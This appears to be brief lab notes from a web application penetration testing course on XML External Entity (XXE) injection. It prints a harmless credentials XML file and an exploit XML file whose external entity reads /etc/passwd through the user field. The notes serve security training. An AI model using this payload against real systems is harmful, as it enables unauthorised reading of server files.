Web App - XXE
XXE - External Entities Injection
cd $HOME/peh/labs/user-content
xxe-exploit.xml
xxe-safe.xml
cat xxe-safe.xml
<?xml version="1.0" encoding="UTF-8"?>
<creds>
<user>testuser</user>
<password>testpass</password>
</creds>
cat xxe-exploit.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE creds [
<!ELEMENT creds ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds><user>&xxe;</user><password>pass</password></creds>
Last updated